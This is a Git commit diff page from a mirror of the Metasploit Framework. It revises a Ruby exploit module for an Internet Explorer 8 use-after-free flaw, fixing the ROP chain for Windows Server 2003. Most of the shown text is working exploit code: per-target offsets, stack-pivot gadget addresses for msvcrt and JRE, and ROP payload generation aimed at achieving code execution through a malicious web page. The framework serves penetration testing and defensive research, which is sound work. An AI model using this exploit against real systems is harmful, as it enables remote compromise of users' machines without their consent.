infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

fixed rop chain for w2003

bug/bundler_fix
jvazquez-r7 2012-12-30 13:12:55 +01:00
parent cab84b5c27
commit cd58cc73d9
1 changed files with 13 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb
View File

@ -58,8 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'Automatic', {} ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30
[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30
[ 'IE 8 on Windows Server 2003', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30
[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30
[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30
[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30
],
'Privileged' => false,
'DisclosureDate' => "Dec 27 2012",
@ -90,9 +90,6 @@ class Metasploit3 < Msf::Exploit::Remote
os_name = 'Windows Vista'
when '6.1'
os_name = 'Windows 7'
else
# OS not supported
return nil
end
targets.each do |t|
@ -152,10 +149,17 @@ Stack Pivoting to eax:
case t['Rop']
when :msvcrt
print_status("Using msvcrt ROP")
stack_pivot = [0x77c15ed6].pack("V") * 54 # ret
stack_pivot << [0x77c2362c].pack("V") # pop ebx, #ret
stack_pivot << [0x77c15ed5].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
if t['Name'] =~ /Windows XP/
stack_pivot = [0x77c15ed6].pack("V") * 54 # ret
stack_pivot << [0x77c2362c].pack("V") # pop ebx, #ret
stack_pivot << [0x77c15ed5].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
else
stack_pivot = [0x77bcba5f].pack("V") * 54 # ret
stack_pivot << [0x77bb4158].pack("V") # pop ebx, #ret
stack_pivot << [0x77bcba5e].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'})
end
else
print_status("Using JRE ROP")
stack_pivot = [0x7c348b06].pack("V") * 54 # ret